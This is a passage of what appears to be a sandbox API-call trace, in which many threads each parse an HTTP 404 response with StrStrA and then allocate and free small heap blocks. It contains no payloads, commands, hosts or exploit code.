lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 105 os_tid = 0x1174 [0195.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.470] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0195.470] GetProcessHeap () returned 0x690000 [0195.470] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8c8 [0195.470] GetProcessHeap () returned 0x690000 [0195.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8c8 | out: hHeap=0x690000) returned 1 [0195.470] GetProcessHeap () returned 0x690000 [0195.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 106 os_tid = 0x118c [0195.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.643] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0195.643] GetProcessHeap () returned 0x690000 [0195.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8c8 [0195.644] GetProcessHeap () returned 0x690000 [0195.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8c8 | out: hHeap=0x690000) returned 1 [0195.644] GetProcessHeap () returned 0x690000 [0195.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 107 os_tid = 0x1190 [0195.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.879] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0195.879] GetProcessHeap () returned 0x690000 [0195.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae850 [0195.879] GetProcessHeap () returned 0x690000 [0195.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae850 | out: hHeap=0x690000) returned 1 [0195.879] GetProcessHeap () returned 0x690000 [0195.880] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 108 os_tid = 0x11a4 [0196.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.016] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0196.016] GetProcessHeap () returned 0x690000 [0196.016] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae850 [0196.016] GetProcessHeap () returned 0x690000 [0196.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae850 | out: hHeap=0x690000) returned 1 [0196.016] GetProcessHeap () returned 0x690000 [0196.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 109 os_tid = 0x11a8 [0196.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.267] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0196.267] GetProcessHeap () returned 0x690000 [0196.267] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae850 [0196.267] GetProcessHeap () returned 0x690000 [0196.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae850 | out: hHeap=0x690000) returned 1 [0196.268] GetProcessHeap () returned 0x690000 [0196.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 110 os_tid = 0x11bc [0196.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.445] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0196.445] GetProcessHeap () returned 0x690000 [0196.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae850 [0196.445] GetProcessHeap () returned 0x690000 [0196.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae850 | out: hHeap=0x690000) returned 1 [0196.445] GetProcessHeap () returned 0x690000 [0196.446] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 111 os_tid = 0x11c0 [0196.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.632] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0196.632] GetProcessHeap () returned 0x690000 [0196.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae850 [0196.632] GetProcessHeap () returned 0x690000 [0196.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae850 | out: hHeap=0x690000) returned 1 [0196.632] GetProcessHeap () returned 0x690000 [0196.633] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 112 os_tid = 0x11d4 [0196.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.842] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0196.842] GetProcessHeap () returned 0x690000 [0196.842] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8f8 [0196.842] GetProcessHeap () returned 0x690000 [0196.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8f8 | out: hHeap=0x690000) returned 1 [0196.842] GetProcessHeap () returned 0x690000 [0196.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 113 os_tid = 0x11d8 [0197.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.025] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.026] GetProcessHeap () returned 0x690000 [0197.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8f8 [0197.026] GetProcessHeap () returned 0x690000 [0197.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8f8 | out: hHeap=0x690000) returned 1 [0197.026] GetProcessHeap () returned 0x690000 [0197.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 114 os_tid = 0x11ec [0197.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.223] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.223] GetProcessHeap () returned 0x690000 [0197.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae928 [0197.223] GetProcessHeap () returned 0x690000 [0197.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae928 | out: hHeap=0x690000) returned 1 [0197.223] GetProcessHeap () returned 0x690000 [0197.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 115 os_tid = 0x11f0 [0197.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.363] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.363] GetProcessHeap () returned 0x690000 [0197.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae928 [0197.363] GetProcessHeap () returned 0x690000 [0197.363] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae928 | out: hHeap=0x690000) returned 1 [0197.363] GetProcessHeap () returned 0x690000 [0197.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 116 os_tid = 0x1204 [0197.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.536] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.536] GetProcessHeap () returned 0x690000 [0197.536] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae940 [0197.536] GetProcessHeap () returned 0x690000 [0197.536] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae940 | out: hHeap=0x690000) returned 1 [0197.536] GetProcessHeap () returned 0x690000 [0197.537] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 117 os_tid = 0x1208 [0197.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.785] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.785] GetProcessHeap () returned 0x690000 [0197.785] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae940 [0197.785] GetProcessHeap () returned 0x690000 [0197.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae940 | out: hHeap=0x690000) returned 1 [0197.785] GetProcessHeap () returned 0x690000 [0197.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 118 os_tid = 0x121c [0197.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.982] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.982] GetProcessHeap () returned 0x690000 [0197.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae940 [0197.982] GetProcessHeap () returned 0x690000 [0197.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae940 | out: hHeap=0x690000) returned 1 [0197.982] GetProcessHeap () returned 0x690000 [0197.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 119 os_tid = 0x1220 [0198.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.170] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0198.170] GetProcessHeap () returned 0x690000 [0198.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae940 [0198.170] GetProcessHeap () returned 0x690000 [0198.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae940 | out: hHeap=0x690000) returned 1 [0198.170] GetProcessHeap () returned 0x690000 [0198.171] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 120 os_tid = 0x1234 [0198.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.366] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0198.366] GetProcessHeap () returned 0x690000 [0198.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0198.366] GetProcessHeap () returned 0x690000 [0198.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0198.366] GetProcessHeap () returned 0x690000 [0198.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 121 os_tid = 0x1238 [0198.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.553] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0198.553] GetProcessHeap () returned 0x690000 [0198.553] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0198.553] GetProcessHeap () returned 0x690000 [0198.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0198.554] GetProcessHeap () returned 0x690000 [0198.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 122 os_tid = 0x1244 [0198.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.788] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0198.788] GetProcessHeap () returned 0x690000 [0198.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0198.788] GetProcessHeap () returned 0x690000 [0198.788] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0198.788] GetProcessHeap () returned 0x690000 [0198.789] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 123 os_tid = 0x1248 [0198.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.002] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0199.002] GetProcessHeap () returned 0x690000 [0199.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0199.002] GetProcessHeap () returned 0x690000 [0199.002] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0199.002] GetProcessHeap () returned 0x690000 [0199.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 124 os_tid = 0x125c [0199.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.182] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0199.182] GetProcessHeap () returned 0x690000 [0199.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0199.182] GetProcessHeap () returned 0x690000 [0199.182] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0199.184] GetProcessHeap () returned 0x690000 [0199.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 125 os_tid = 0x1278 [0199.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.379] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0199.379] GetProcessHeap () returned 0x690000 [0199.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0199.379] GetProcessHeap () returned 0x690000 [0199.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0199.379] GetProcessHeap () returned 0x690000 [0199.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 126 os_tid = 0x127c [0199.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.555] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0199.555] GetProcessHeap () returned 0x690000 [0199.555] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0199.555] GetProcessHeap () returned 0x690000 [0199.555] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0199.555] GetProcessHeap () returned 0x690000 [0199.556] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 127 os_tid = 0x1280 [0199.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.759] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0199.759] GetProcessHeap () returned 0x690000 [0199.759] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0199.759] GetProcessHeap () returned 0x690000 [0199.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0199.759] GetProcessHeap () returned 0x690000 [0199.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 128 os_tid = 0x1294 [0199.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.955] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0199.955] GetProcessHeap () returned 0x690000 [0199.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0199.955] GetProcessHeap () returned 0x690000 [0199.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0199.955] GetProcessHeap () returned 0x690000 [0199.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 129 os_tid = 0x1298 [0200.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.144] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0200.144] GetProcessHeap () returned 0x690000 [0200.144] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0200.144] GetProcessHeap () returned 0x690000 [0200.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0200.144] GetProcessHeap () returned 0x690000 [0200.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 130 os_tid = 0x12a4 [0200.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.282] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0200.283] GetProcessHeap () returned 0x690000 [0200.283] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0200.283] GetProcessHeap () returned 0x690000 [0200.283] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0200.283] GetProcessHeap () returned 0x690000 [0200.283] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 131 os_tid = 0x12a8 [0200.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.527] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0200.527] GetProcessHeap () returned 0x690000 [0200.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0200.527] GetProcessHeap () returned 0x690000 [0200.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0200.527] GetProcessHeap () returned 0x690000 [0200.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 132 os_tid = 0x12bc [0200.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.720] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0200.720] GetProcessHeap () returned 0x690000 [0200.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0200.720] GetProcessHeap () returned 0x690000 [0200.720] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0200.720] GetProcessHeap () returned 0x690000 [0200.720] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 133 os_tid = 0x12d4 [0201.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0201.106] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0201.106] GetProcessHeap () returned 0x690000 [0201.106] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8b0 [0201.107] GetProcessHeap () returned 0x690000 [0201.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8b0 | out: hHeap=0x690000) returned 1 [0201.107] GetProcessHeap () returned 0x690000 [0201.108] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 134 os_tid = 0x12d8 [0202.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.225] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0202.225] GetProcessHeap () returned 0x690000 [0202.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0202.226] GetProcessHeap () returned 0x690000 [0202.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0202.226] GetProcessHeap () returned 0x690000 [0202.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 135 os_tid = 0x12e0 [0202.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0202.858] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0202.858] GetProcessHeap () returned 0x690000 [0202.858] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0202.858] GetProcessHeap () returned 0x690000 [0202.858] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0202.858] GetProcessHeap () returned 0x690000 